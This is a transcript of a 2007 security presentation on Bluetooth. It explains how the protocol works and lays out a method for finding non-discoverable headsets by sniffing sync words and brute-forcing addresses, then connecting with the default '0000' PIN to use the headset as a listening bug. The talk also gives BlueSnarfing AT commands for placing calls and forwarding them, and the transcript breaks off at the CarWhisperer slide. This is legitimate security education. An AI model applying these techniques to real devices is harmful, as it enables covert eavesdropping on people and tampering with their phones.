free to do so by contacting me at jwright@arubanetworks.com. 
 
Slide 2 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightAbout Your Instructor
•J o s h u a  W r i g h t ,  
jwright@willhackforsu
shi.com
•S A N S  I n s t r u c t o r ,  
author of “Assessing 
and Securing Wireless 
Networks”
Presentation at: www.w illhackforsushi.com
 
 
About Your Instructor 
 
My name is Joshua Wright, and I’ll be presenting today on an  attack I’ve been 
developing against Bluetooth h eadsets.  I’m a SANS instructor, and the author of the 
SANS Institute Assessing a nd Securing Wireless Networks course, where we spend 5 
days investigating wireless threats against IEEE 802.11, WiMAX and Bluetooth 
networks, followed by a step-by-step day of  designing and deploying a secure wireless 
infrastructure.  Throughout the class, student s will leverage the SANS Wireless Auditing 
Toolkit (SWAT) for lab exercises, which in cludes a high-gain wireless card and panel 
antenna, GPS and accompanying software on a Linux bootable CD. 
 
Slide 3 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightTrends in Driving
• Many states have passed laws 
requiring hands-free driving
• Many users turn to Bluetooth 
technology for wireless headsets
– Also car phone systems, some built-in
CT, NY, NJ and the District of  Columbia have enacted laws 
prohibiting driv ing while talking on handheld cell phones
Governors Highway Safety Association: www.ghsa.org/html/stateinfo/laws/cellphone_laws.html
 
 
Trends in Driving  
As the popularity of mobile phones has rise n, many states have passed legislation 
regarding the use of mobile phones while driving.  Several states, including Connecticut, 
New York, New Jersey and the District of Columbia have passed laws that prohibit the 
use handheld phones while driving.  This activit y, and otherwise just good driving sense, 
have prompted many consumers to turn to Blue tooth hands-free devices for in-car use.  In 
a slightly smaller portion of the population, Blue tooth headsets have even turned into a 
fashion item, with designer headsets grow ing in popularity, with customizable options 
such as color options. 
 
Slide 4 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightChallenge: Eavesdrop On A 
Bluetooth Headset
• Self-imposed challenge to evaluate 
Bluetooth headset security
• Target: Jawbone Headset
– Popular headset, often 
paired with iPhone
– I already owned one, so
it was convenient
 
 
Challenge: Eavesdrop On A Bluetooth Headset  
As part of a self-imposed challenge, I wanted to evaluate we aknesses in Bluetooth 
headset devices.  My selected target is th e popular Jawbone headset.   This particular 
headset is often sold with the Apple iP hone in AT&T/Cingular stores or online. 
The Jawbone headset has two buttons for c ontrolling the device, both of which are 
“hidden” for esthetic reasons.  The device ope rates like many Bluetooth headset devices, 
where the device is by default in non-discovera ble mode with a fixed PIN of “0000” that 
cannot be changed. 
 
Slide 5 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightUnderstanding the Technology
 
 
This page left intentionally blank.  
Slide 6 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightBluetooth Specification
• Cable replacement technology
• Planned usage to replace all cables with 
peripheral computing
• Range: ~1M, 10M, 100M
• Maximum bandwidth: 2.1 Mbps (EDR)
•F r e q u e n c y :  2 . 4  G H z ,  F H S S
– High degree of interference immunity
• Price goal: $5 per radio unit
 
 
Bluetooth Specification 
 
Simple stated, Bluetooth is designed as a cable replacement technology.  I'm sure we're 
all familiar with the heartache of traveling to a location, getting our your gear only to 
discover that you're missing some obscure ca ble to connect A to B, or perhaps the 
attractive cluster of cables behind your desk  connecting all of our  peripheral devices 
together.  Bluetooth is designed to place all peripheral cabling,  designed to emulate 
existing cabling systems (such as serial devices, or network connections). 
 Bluetooth transmitters come in three varieties; Class 1, 2 and 3 devices.  A Class 3 device is designed to transmit at a range of appr oximately 1 meter with a transmit power of 
1mW (0 dBm).  Class 2 devices transmit at a range of 10 meters with  a transmit power of 
2.5 mW (4 dBm).  Class 1 devices are the mo st powerful transmitters with a range of 100 
meters and a transmit power of 100 mW ( 20 dBm), rivaling the transmit power and 
distance of IEEE 802.11b transmitters. Class 2 devices are the most popular vari ety of Bluetooth transmitter in phones and 
headsets providing a useful mix of low-pow er consumption and useful range.  Class 1 
devices are very popular as  USB dongles for laptops and other peripherals. 
 The maximum bandwidth of a Bluetooth Enha nced Data Rate (EDR ) dongle is a little 
over 2 Mbps, which isn't fast by modern WLAN networking standards, but is suitable for 
most cable replacement needs.  Using the 2.4 GHz spectrum, Bluetooth devices implement Frequency Hopping Spread Spectrum (FHSS) by rapidly hopping through a large channel set.  With channel hopping, Bluetooth devices have a high level of 
interference immunity, since th ey are only subject to a narrow-band jammer when they 
hop in the jammed frequency ra nge; later frequency hops are error-free and unaffected by 
the jammer.  
An important consideration in the evaluation of  Bluetooth security is  that the pricing goal 
of a Bluetooth radio was set at $5/USD.  Th is goal is important for widespread adoption 
of Bluetooth technology, but limits the opti ons available to Bluetooth engineers for 
strong cryptography and other security mechanisms. 
 
Slide 7 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightBluetooth FHSS Channels
• Bluetooth uses 79 channels (0-78)
• Hops 1600 times a second
• Hopping pattern ba sed on Bluetooth 
device address (BD_ADDR)
– Makes hopping pattern unique for each 
device, limits collisions
• Leverages Time Division Duplexing
– Alternating TX and RX
 
 
Bluetooth FHSS Channels 
 
A Bluetooth transmitter uses Frequency Hopping Spread Spectrum to channel hop in a 
set of 79 channels, ranging from 2.402 GHz  to 2.480 GHz.  Two devices communicating 
leverage a Time Division Duplexing strategy, where each device takes a turn transmitting 
and receiving traffic between channel hops.  Bluetooth networks implement FHSS with ve ry a very rapid channel hopping strategy, 
where devices channel hop at 1600 hops a s econd under normal circumstances, and as 
fast as 3200 hops a second when initially connecting.  In order to avoid collisions with other Bluetooth transmitters in the same ar ea, Bluetooth uses pseudo-random generation 
algorithm to identify the frequency hopping pattern between two devices.  The hopping 
pattern is based on the Bluetooth Device Addr ess information, a unique identifier that is 
assigned to every Bluetooth transmitter.  
Slide 8 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightBluetooth Piconets
• Basic network architecture
• Device initiating connection is the 
master
• Up to 7 slaves actively in piconet• Star topology• Can be extended to
form a scatternet
 
 
Bluetooth Piconet 
 
Bluetooth networks are not limited to one-t o-one communication; a groups of Bluetooth 
devices can come together to form a piconet of up to 7 devices.  In each piconet there is 
one device classified as the master which is  responsible for network synchronization and 
authorization.  The FHSS ch annel hopping pattern is de rived from the master's 
BD_ADDR information. 
All other devices in the piconet are considered slave devices.  In order to be certified as a 
Bluetooth device, manufacturers must implem ent devices to accommodate the role of 
either master or slave, such that any device can initiate the piconet or join the piconet. 
Bluetooth piconets can be exte nded as well, where any device that is participating as a 
slave can be the master of another piconet at the same time, linking the two piconets 
together and forming a scatternet.  
Slide 9 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightBluetooth Protocol Stack
(not to scale)Radio Interface, RF ControllerBaseband Controller, Framing Link Manager Protocol (LMP)Host Controller Interface (HCI)Logical Link Control and Adaptation ProtocolBluetooth Profiles (RFCOMM, BNEP, OBEX)PPP, IP stack, Applications
 
 
Bluetooth Protocol Stack  
In order to accommodate the relatively low cost of a Bl uetooth radio, the Bluetooth 
protocol stack is designed in a layered appr oach.  The layered approach allows different 
portions of the protocol stack to be designed independently and tightly integrated into 
hardware, which is important for lightweight de vices such as headsets that have limited 
memory availability. 
 At the bottom of the stack if the RF controlle r or the radio interface.  This layer handled 
functionality including ch annel changing, synchronization of receive and transmit 
functions, and data modulation and demodulation. The baseband controller is responsible for assembling th e Bluetooth packet header 
information, and for applying error checki ng and data whitening (removing DC bias) 
functions. The link manager protocol (LMP) is respons ible for establishi ng and tearing down a 
piconet, as well as the disc overy and enumeration of remo te Bluetooth devices.  The 
LMP layer is also responsible for negotiating security such as de vice authentication and 
link encryption.  In standard Bluetooth hardware , the lower three layers are imp lemented in firmware or in 
hardware, and are generally not accessible to Bluetooth developers.  Instead, Bluetooth 
developers interact with the host controller layer (HC I) which resides at a boundary 
between the host operating system (such as  Windows or Linux) and the Bluetooth 
hardware.  The HCI layer abstracts Blueto oth functionality such as establishing a 
connection, or probing for available devices.  Above the HCI layer is the Logical link Cont rol and Adaptation Protocol (L2CAP) is an 
abstraction layer above the HCI and LMP laye rs, handling application functionality for 
upper-layer protocols. L2CAP is responsible  for managing connectivity between multiple 
applications using the same Bluetooth in terface simultaneously, as well as packet 
fragmenting and reassembly and QoS functions. 
Above the L2CAP layer are Bluetooth profiles.   The Bluetooth profiles implement useful 
functions for Bluetooth devices, including th e ability to emulate a serial connection 
(Radio Frequency Communication/RFCOMM), provide network connectivity between multiple Bluetooth devices (Bluetooth Network Encapsulation Protocol/BNEP) and arbitrary file exchanges (Obj ect Exchange Protocol/OBEX). 
 Finally, above the Bluetooth profiles layer, the standard operating system functions are 
used.  For example, the IP stack may inter act with the BNEP profile to access the LAN 
over Bluetooth, or the PPP process may use th e RFCOMM profile as a virtual serial port 
for a simulated dial-up connection.  
Slide 10 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightBluetooth Addressing
• BD_ADDR, 802-compliant 48-bit 
address for each device
– Bluetooth Device Address
• Used as a "secret" in Bluetooth
• Three bytes OUI, three bytes from 
the vendor
 
 
Bluetooth Addressing 
 
We've discussed how every Bluetooth devi ce has its own BD_ADDR, or Bluetooth 
Device Address.  The BD_ADDR informa tion is an IEEE 802-compliant, 48-bit MAC 
address that is allocated by th e manufacturer to the Bluet ooth device.  Like standard 
IEEE 802 addresses, this addre ss is made up of the organizationally unique identifier 
(OUI) portion of the address which is alloca ted to the vendor, and three additional bytes 
that are allocated to devices by the manufacturer. 
 In the Bluetooth specifica tion, the BD_ADDR informati on is divided into three 
components: LAP; The Lower Address Part or LAP is the last three bytes of the BD_ADDR.  The LAP represents the MAC address bytes a llocated by the vendor to the device. 
UAP; Upper Address Part or UAP is the last  byte of the OUI allocated to the vendor. 
NAP; Non-significant Address Part  or NAP is the first two byt es of the OUI allocated to 
the vendor.  In Bluetooth networks, the BD_ADDR informati on is treated as a secret.  In order to 
connect to the piconet, the slave must have knowledge of the BD_ADDR  of the master; if 
the BD_ADDR is not known, the slave cannot connect to the piconet. 
 
Slide 11 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightBluetooth Baseband Header 
• Unlike 802.3/802.11, MAC address is not 
specified in the baseband header
• Upon joining piconet, the device gets a 
Logical Transport (LT) address
• Type specifies frame use, number of slots
• HEC is a checksum on header calculated
with UAP
 
 
Bluetooth Baseband Header 
 
In the standard Ethernet a nd WLAN frame headers, the MA C addresses of the source and 
destination devices are present, allowing anyone  who captures this information to be able 
to identify the transmitter and the receiver.   In a Bluetooth frame, the MAC address 
(BD_ADDR) information is not present si nce the transmission of two 48-bit MAC 
addresses for each frame is considered too much overhead for Bluetooth.  Since 
Bluetooth is a TDD architecture, there is no need for specifying a source and destination 
address, since traffic is only transmitted between the master and one or more slave 
devices. Instead of using the entire MAC address in  the baseband header, Bluetooth devices are 
allocated a Logical Transport address (LT_ADDR ) when they connect to the piconet.  
The LT_ADDR is the first three bits in the Bluetooth baseband header, and is used to 
identify the slave device that should pro cess the frame information from the master 
device.  Because this field is only three bi ts in length, it can only represent 8 unique 
devices addresses; the LT_ADDR zero is reserved for frames being sent to the broadcast 
address.  Since the master does not have a LT_ADDR, seven other values are possible, 
representing the maximum number of  slave devices in the piconet. 
The type field in the baseband header represents the type of packet being transmitted.  The type field can be used to identify asynchr onous traffic, synchronous traffic, or special 
management frames. The flow field is used to implement flow cont rols with the transmission of real-time data 
where the data recipient can stop the transmission of data  by sending a frame with the 
flow bit set. The ARQN field implements the Automatic  Repeat reQuest Number acknowledgement 
mechanism, where the receiver can send a fram e to positively or negatively acknowledge 
a frame with checksum information. The SEQN field is a simple flip-flop bit for or dering the packet stream.  Each frame that 
is transmitted flips the SEQN bit before the next packet is transmitted. 
The HEC field is the header error correction checksum.  The HEC is calculated over the 
baseband header contents to ensure it wa s not accidentally corrupted in transit. 
 
Slide 12 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightJoining the Piconet
• Master initiates connection to slave
– FH based on master BD_ADDR
– Slave must know BD_ADDR to determine 
correct hopping sequence
• Discovering the BD_ADDR – Inquiry
– Known as "discoverable" mode
– Devices response to inquiries with 
BD_ADDR information
 
 
Joining the Piconet 
 
When two Bluetooth devices wi sh to communicate, a piconet is formed.  The device that 
initiates the connection to another device is elected the master of the piconet network, 
and is responsible for managing the piconet and any security practices used in the 
network.  The master and slave devices use the BD_ADDR of the master device to 
generate the frequency hopping pattern and start hopping to communicate with each 
other.  Since the BD_ADDR of the master is requ ired to identify the hopping pattern, knowing 
this address is mandatory for a device that wi shes to participate in the piconet.  A device 
manufacturer could accommodate a human- interface device (HID) to allow users to 
manually enter the BD_ADDR information on the slave, but this is no t useful for devices 
without HID interfaces.  As an alternate comm unication mechanism, Bluetooth includes a 
feature where a device can probe other devi ces for their BD_ADDR information.  Known 
as inquiry mode or discoverable mode, a device  that is not currently  participating in the 
piconet can probe for other Bluetooth devices in the area and learn their BD_ADDR 
information in the process.  
Slide 13 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightBluetooth Link Authentication
• Completed when devices first pair
• User security: PIN selection
• PIN is mixed with BD_ADDR to 
generate 128-bit key content
• Modified SAFER+ cipher used to hash 
content for authen tication exchange
• Successful authentication produces link 
key, used for subsequent authentication
 
 
Bluetooth Link Authentication 
 
When security mode 3 is in use, Bluetooth encrypts all traffic before transmitting it over 
the air, and authenticates the identity of the slave device to the master.  For practical 
implementations, the authentication component  is based on a PIN value that is hard-
coded into the device, or is selected by the user. 
When two devices pair for the first time, the PIN is used to authenticate the user, and is 
then used with the BD_ADDR of the master device to generate a 128-bit encryption key 
known as the link key.  The PIN is not tran smitted in plaintext across the Bluetooth 
connection, rather, it is protected using a classic challenge/response protocol that leverages a modified version of the SAFER+ cipher. After authentication, the link ke y is stored on both devices an d is used for subsequent 
connections to authenticate both parties.  This is beneficial  to Bluetooth security, since 
the PIN is only ever used in the authentication process during the initial pairing; later connections use the link key for authentication. 
 
Slide 14 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightBluetooth Link Encryption
• Bluetooth SIG devised new encryption 
mechanism – E0 cipher
• Stream cipher generates pseudorandom 
data stream (like RC4)
– Stream XOR’d with plaintext to produce 
ciphertext
• Uses Linear Shift Feedback Registers 
(LSFR) for ease in hardware adaptation
 
 
Bluetooth Link Encryption  
Due to the demands for inexpensive, light weight Bluetooth devi ces, the Bluetooth 
Special Interest Group (SIG) designed their own encryption mechanism known as the E0 
cipher for encrypting Bluetooth tr affic with mode 3 security.  E0 is a stream cipher like 
the RC4 cipher (RC4 is also used in th e TLS, WEP and TKIP protocols), generating a 
pseudorandom data stream (known as the ps eudo-random generation algorithm or PRGA) 
that is XOR'd with the plaintext data to produce ciphertext.  This has the advantage of being fast and simple to implement, since the decryption routine is the same as the 
encryption routine; when decrypting, the ciphertext is XOR'd with the PRGA to produce plaintext. The E0 cipher was selected and implemented to be simple to offload into hardware.  E0 is 
based on a linear shift feedback register (L SFR), which can be easily implemented in 
inexpensive hardware.  This is as opposed to a more complex cipher like the Advanced 
Encryption System which requires significan t processing capabilities to implement. 
 
Slide 15 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightBluetooth Security: Effectively
• Must know BD_ADDR to follow hopper
– Discoverable/non-discoverable modes
• PIN influences security, sometimes not user-
selected
• Pairing reveals information for an offline PIN 
attack (only once)
– Later connection establishment protected by 128-
bit link key
• Weak initial connectivity to headsets, rely on 
non-discoverable mode protection
 
 
Bluetooth Security: Effectively  
Before we finish this part of the module, let's summarize some of the Bluetooth security 
functions that are available today: 
 Frequency Hopping makes sniffing difficult, since the sniffer must be able to hop along 
in synchronization with the transmitters. In order to know the frequency hopping pattern, devices must know the BD_ADDR 
information.  If the master device is in discoverable mode, it can be queried by an 
unauthenticated device for the BD_ADDR information. The selection of a PIN influences the security of the network, but the selection of the PIN 
is not always possible without a man-machine interface. During the initial pairing exchange, the PIN is vulnerable to an offline brute-force PIN enumeration attack.  This is only a vulnerabil ity the first time two devices pair however.  
Successive connections between the devices leve rage a previously established and stored 
128-bit link key and does not utilize PIN information. 
Bluetooth headset devices often have a defau lt PIN of “0000” or “1234”.  The significant 
feature that makes these devices more resilient to  attack is the fact that they are deployed 
in non-discoverable mode.  Since an a ttacker does not know the BD_ADDR of the 
device, they are unable to establish a connection.  
Slide 16 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightCommon Bluetooth 
Misconceptions
 
 
This page left intentionally blank.  
Slide 17 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightCommon Misconception 1
• Class 1 devices have a range of 100M 
(328’), comparable to 802.11
• Class 2 devices have a range
of 10M
• Possible to extend range 
with directional antennas
• Linksys USBBT100"Bluetooth is a shor t-range technology"
 
 
Common Misconception 1  
"Bluetooth is a shor t-range technology" 
 
Many organizations disregard th e security of Bluetooth networks as a concern because 
they consider Bluetooth to be a short-ra nge technology.  Bluetooth technology is not 
limited to short-range connections however, with class 1 Bluetooth devices transmitting at 100mW, which is approximately 100 meters or 328 feet, comparable to the range of an 
802.11b WLAN device.  Class 1 devices are most commonly implemented in devices where power is plentiful, such as laptop and desktop systems. In contrast, class 2 devices transmit at 2.5 mW  with a range of approximately 10 meters 
or 32 feet.  Class 2 devices are the most common Bluetooth transmitters for their fair 
range with less power requirements than class 1 devices.  Most mobile phones and 
Bluetooth headsets ar e class 2 devices. 
Since Bluetooth devices operate in the 2.4 GHz  spectrum, they use the same commodity 
antennas designed for WLAN devices.  Wh ile vendors don't design Bluetooth dongles 
with external antenna conn ectors, some Bluetooth dongles such as the Linksys 
USBBT100 can be modified to accommoda te an external antenna connector. 
 
Slide 18 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightLong-Range Bluetooth
• Possible to connect to class 2 device 
(10M) from over a mile away
– Using class 1 source device and 18 dBi 
gain antenna
 
 
Long-Range Bluetooth  
Armed with a class 1 dongle and a high-ga in 2.4 GHz antenna, it is possible for an 
attacker to connect to a cla ss 2 device (designed for a range of 10 meters) from a distance 
of over a mile.  This allows an attacker to exploit even short-range Bluetooth devices 
from a significant distance. 
 
Slide 19 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightCommon Misconception 2
• Bugs in several phones allows retrieval of 
phonebook, calendar
• Can also be used to make calls remotely, 
manipulate call forwarding, etc."Bluetooth does not expose sensitive data"
 
 
Common Misconception 2  
"Bluetooth does not expose sensitive data" 
 Another misconception about Bluetooth networks is that they don't represent a mechanism to expose any sensitive data.  C onsider the attack know n as the BlueSnarfing 
attack.  Targeting several popular Nokia and Ericsson phones, the BlueSnarfing attack leverages a flaw where phones expose the RFCOMM profile on an undocumented service 
that allows an attacker to connect to the device without authentica tion.  Using the serial 
connectivity provided by the RFCOMM profile, an attacker can execute arbitrary AT 
commands to manipulate the remote device, in cluding the ability to retrieve, modify and 
delete phonebook and calendar entries. The bluesnarfer tool implements this attac k, where the attacker can specify a remote 
phonebook (stored numbers, recent outgoing ca lls, recent incoming calls, etc) and 
retrieve, modify or delete the results.  If  the attacker connects to the RFCOMM service 
manually with a terminal emulator tool (e ither on Windows or Linux systems), they can 
enter manual AT commands, such as initiati ng a call ("ATDT911"), forwarding all calls 
to a specified number ("AT+ CCF911") or redial the last number called ("ATDL").  Even 
more potentially useful information is availabl e for the attacker, including the Electronic 
Serial Number of the phone ("AT+CGSN").  
Slide 20 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightCommon Misconception 3
• E0 is designed as a new cipher suite for 
Bluetooth
– "New cipher suite?  What?!"
• Evaluation of new crypto takes a long time
• Research indicates E0 is considerably 
weaker than originally intended
–C r a c k e d  i n  238operations, not 2128"Weaknesses are limited to implementation flaws"
 
 
Common Misconception 3 
 
"Weaknesses are limited to implementation flaws" 
 In the design of the Bluetooth specifica tion, the Bluetooth SIG invented their own 
encryption mechanism, known as the E0 ciphe r.  It is generally frowned upon in the 
cryptography community when someone invent s their own encryption mechanism, since 
it can take many years to fully understand th e implications of the cipher and potential 
weaknesses.  Recent research into the E0 cipher from the LASEC Security and 
Cryptography Labs has revealed  that while E0 was designed to provide 128-bit security 
levels, it has sufficient weaknesses such  that it can be compromised with 2
38 operations, 
instead of 2128. 
 The research paper highlighting this wea kness in the E0 cipher is available at 
http://lasecwww.epfl.ch/pub/lasec/doc/LMV05.pdf , with presentation slides from the 
International Association for Cr yptologic Research available at 
http://www.iacr.org/conferences/crypto2005/p/16.pdf.  
Slide 21 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightCommon Misconception 4
• Many devices rely on privacy of BD_ADDR 
for security
– Do not respond to inquiries
• Must know BD_ADDR to pair (determines 
FH pattern)
• BD_ADDR not transmitted in baseband 
header (only LT_ADDR)"Devices in non-discoverab le mode cannot be found"
 
 
Common Misconception 4  
"Devices in non-discoverabl e mode cannot be found" 
 
Many devices rely on the secrecy of the BD_A DDR information for security.  Bluetooth 
headsets, for example, do not have a mechanism for a user to specify a PIN value to as an 
authentication mechanism, and solely rely  on not disclosing the BD_ADDR information 
in discoverable mode to protect the device. We've established that the BD_ADDR inform ation must be known by the slave device to 
pair with the master in a piconet, and that sniffing the wireless network does not reveal 
the BD_ADDR information in the baseband header.  Current resear ch suggests that this is 
an acceptable form of protection for secu ring Bluetooth headsets, as long as the 
BD_ADDR for the device remains a secret.  
Slide 22 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightBTScanner – Bluetooth Discovery
• Attempts to discover devices by brute-
forcing MAC addresses
• Optimistic 25000 msec between 
requests (24/minute), very slow
 
 
BTScanner – Bluetooth Discovery  
One tool designed to identify the BD_ADD R information for a target device is 
BTScanner.  Designed for Linux systems, BTS canner attempts to brute-force the 48-bit 
MAC address of a device in non-discovera ble mode by issuing repeated connection 
requests to sequentially-selected BD_ADDR's. 
Optimistically, BTScanner must spend 25,000 ms ec between each successive request for 
the BD_ADDR guess, which means that a si ngle Bluetooth dongle can make 24 request 
each minute.  This makes BTScanner a very slow tool when attempting to enumerate a large range of potential MAC addresses. One mechanism to accelerate the BTScanner atta ck is to use more than one Bluetooth 
dongle in parallel.  Using lots of Blue tooth dongles simultaneously, BTScanner can 
accelerate the attack, though even with 10 Bl uetooth dongles, the attack is only guessing 
at 240 BD_ADDR a minute.  Practically, if the attacker knows the firs t three bytes of the 
BD_ADDR from the manufacturer of the device (a Motorola headset, for example, will 
have a consistent three-byte OUI prefix), and has to enumerate the last three bytes of the 
BD_ADDR, BTScanner will need to make 16.7 million requests.  At a rate of 240 
requests each minute, the scan can take over 48 days to complete! 
  
Slide 23 
 
Hidden Risks of Bluetooth – © 2007 Joshua Wright"Hello IT, have you tried turning 
it off and on again?"
• Common troubleshooting technique
• When a user wants to pair, one device 
must be discoverable
– Common support issue
• Motorola recognizes this, intuitive user 
behavior is to turn off and on
– Discoverable mode for 60 seconds
What happens when the plane touches the tarmac?
 
 
"Hello IT, have you tried turning it off and on again?" 
 
As a helpdesk support operator for Microsoft Windows software, the first and probably 
the most important troubleshooti ng technique is to ask the us er "Have you tried turning it 
off and on again?"  This is a common troubleshooting techniqu e, that even novice 
computer users have become accustomed to. When two Bluetooth devices need to pair for th e first time, one of the devices must be in 
discoverable mode.  If both devices are not in discoverable mode by default (the 
preferred security configuration), the end-user will be unable to pair the devices and may resort to troubleshooting techni ques to rectify the situation.  Recognizi ng this, Motorola 
has adapted several of its Bluetooth devices such that when the device boots, it is in 
discoverable mode for a short period of time, usually 60 seconds.  This adapts well to the common troubleshooting method of "have you tried turning it off and on again", since if 
the user decides to reboot th e device when troubleshooting a pairing problem, the device 
will be available in discoverable mode for a short time. However, this troubleshooting feature can have undesirable circumstances.  When 
boarding a plane, passengers are advised to  turn off all electro nic devices, including 
mobile phones.  However, as soon as the plane touches down, passenge rs are allowed to 
turn their phones on again.  Du ring this time, a curious atta cker can easily obtain the 
BD_ADDR information for many devices, by ta king advantage of this small window of 
discoverable mode behavior.  The attacker doe s not need to exploit devices on the plane; 
if he has collected BD_ADDR information, he  can use these addre sses to attack his 
fellow passengers in the airport wh ile waiting for connecting flights. 
 
Slide 24 
 
Hidden Risks of Bluetooth – © 2007 Joshua Wright
Me
 
 
LR3 - Designed for the Extraordinary  
Bluetooth has been adapted in metropolitan areas to deliver marketing and advertising 
information to devices as well.  This picture of the corner of 7
th and West 49th Street in 
New York City, NY, where a billboard advises passers-by to make their "... Bluetooth 
handset discoverable and get the whole story now", about the Land Rover LR3 vehicle. Once placed into discoverable mode, the billboard  will beam an interactive application to 
the person walking by.  However, an attacker  in the same location can now also take 
advantage of this opportunity, and identify BD_ADDR information from people as they 
follow the instructions on the billboard.  
Slide 25 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightDiscovering the Undiscoverable
• Synchronization word data precedes 
baseband header
• Header encodes LAP of master to 
differentiate piconets
– Capturing SYNC WORD reveals 24-bits of 
the master BD_ADDR
• Not revealed with standard Bluetooth 
hardware, only inspected in hardware
 
 
Discovering the Undiscoverable  
In order to connect to a Bl uetooth device, knowledge of th e BD_ADDR is needed.  While 
the secrecy of this information prevents other devices from connecting in an unauthorized 
manner, this is certainly a weak authentication mechanism.  For each single-frame slot transmitted by a Bluetooth piconet member includes a data preamble before the beginning of the baseband header known as the sync word.  The sync 
word is used to differentiate traffic from multiple piconets by the receiving station, where 
the transmitter embeds the LAP (last three bytes) of the master device into the sync word.  
Capturing the sync word data  reveals 24-bits of the BD_A DDR of the master of the 
piconet.  Knowledge of the LAP can be very valuab le for the attacker, since it discloses a 
significant portion of the BD_ADDR for the piconet.  This information cannot be 
retrieved by a standard Bluetoot h dongle however (nor can it be  returned with any of the 
commercial Bluetooth sniffers on the market) as it is only processed in hardware with the 
receipt of a frame, and it is not pa ssed up to the host operating system. 
 
Slide 26 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightRetrieving the Sync Word
• Software Defined Radio (SDR) opens new 
visibility into wireless spectrum
– Hardware receivers, software demodulators
• Ettus.com - SDR hardware, 2.4 GHz RX: 
~$1K
• GNURadio - Demodulators
for GMSK, adapted for
Bluetooth GFSK
– Dominic Spill
 
 
Retrieving the Sync Word 
 
Tools to capture the sync wo rd are not commonly availabl e, as standard Bluetooth 
dongles are not designed to allow users to interact w ith the hardware beyond the 
interfaces exposed at the HCI later. 
To overcome this limitation and have access to sniff Bluetooth frames, development 
board such as the University Software Radio Peripheral (USRP) can be used to write custom demodulators to retrie ve Bluetooth data including th e sync word.  Much of the 
work to demodulate Bluetooth traffic is alr eady complete through the GNURadio project, 
requiring MAC-layer processing to iden tify the start of Bluetooth data. 
On August 1
st 2007, Dominic Spill from the University College London published a 
paper at the Usenix Woot07 conference, wh ere he debuted software to implement a 
minimally-featured Bluetooth stack using th e USRP.  While the USRP is unable to 
frequency hop in synchronization with the other Bluetooth transmitters (the USRP hardware is incapable of hopping at a rate of 1600 hops/second), it is possible to listen on 
a single frequency, and demodulate (decode) Blue tooth traffic as it is transmitted on the 
selected channel.  
Slide 27 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightSync Word Result
• Attacker can identify devices in non-
discoverable mode
– Listen on a single channel, capture sync word as 
devices hop onto the selected channel
• Only 1⁄2 of BD_ADDR (LAP) is retrieved
• Remaining NAP and UAP unknown
– NAP + UAP = OUI (first 3 bytes of MAC)
• Possible to brute-force OUI (16-bits, assuming 
leading 0x00 in OUI)
 
 
Sync Word Result 
 
Using tools such as the USRP and GNURadio, an attacker ca n sniff on a single frequency 
to identify Bluetooth devices that are currently transmitting, even when in non-
discoverable mode.  The sync word conten t reveals 3-bytes of the BD_ADDR of the 
master (LAP), leaving only the first three bytes of the BD_ADDR (the OUI, or the NAP 
and UAP information) to be determined. 
Assuming the leading byte of the BD_ADDR is 0, an attacker can adapt a tool like BTScanner to brute-force the remaining 2-bytes.  This represents 65,536 possible 
addresses, which would take approximately 2 days with a single Bluetooth dongle to complete. However, since we are examining the OUI info rmation, it may not be necessary to test all 
BD_ADDR possibilities.  
Slide 28 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightBNAP, BNAP Project
• Asking the community to share 
BD_ADDR information
• Identify most common OUI's
– Theory of a limited number of Bluetooth 
manufacturers (~30?)
• Knowing the LAP, can easily test 30 
OUI's with a standard Bluetooth dongle
http://802.15ninja.net/bnapbnap
 
 
BNAP, BNAP Project  
The BNAP, BNAP project was started to coll ect information about how vendors allocate 
Bluetooth addresses to devices.  When th e LAP is known, the att acker can reduce the 
amount of keyspace to search to discover the BD_ADDR by limiting their tests to well-
known OUI's that have been used for Bluetoot h device allocations. While a list of all the 
IEEE OUI's is available, there was no list of  the OUI's being used by Bluetooth vendors.  
The BNAP, BNAP project asks the community  to share the first several bytes of 
BD_ADDR information from any Bluetooth de vice.  Using this information, we can 
examine how vendors are allocating Bluetooth device addresses, and identify the most common OUI's based on the frequency of submissions.  
Slide 29 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightHeadset as a Listening Bug
• Limitation: When link key is not known, 
unable to decrypt active voice call traffic
– Instead, target headset when not in a call
• Can leverage the audio mic to record audio
– Can also inject audio into the headphone
• Headset PIN is (almost) always “0000”
– Only practical security is non-discoverable mode
Not an attack against active Bluetooth conversations.  
Connecting to a device when not in a call to record/inject audio.
 
 
Headset as a Listening Bug  
With the ability to identify the BD_ADDR of the master device, it is often possible to 
connect to the headset directly, leveragi ng the static, fixed PIN information for 
authentication.  However, passive eavesdropping and decryption re quires knowledge of 
the 128-bit link key that was generated when th e two devices first pa ired.  Knowledge of 
just the PIN information is not sufficient to capture and decrypt an active voice call. 
An alternative attack is to exploit the head set when it is not activ ely engaged in a call, 
using the headset microphone to record any a udio content, and potenti ally play arbitrary 
audio information through the headset to the wearer. Since the PIN on headset devices is 
commonly “0000”, it is trivial for an attacker  to connect to the headset and send and 
receive the same kind of data  that would normally be exch anged with a Bluetooth phone. 
 
Slide 30 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightCarWhisperer
• Designed to connect to car hands-free 
Bluetooth device
– Embedded, or third-party installed
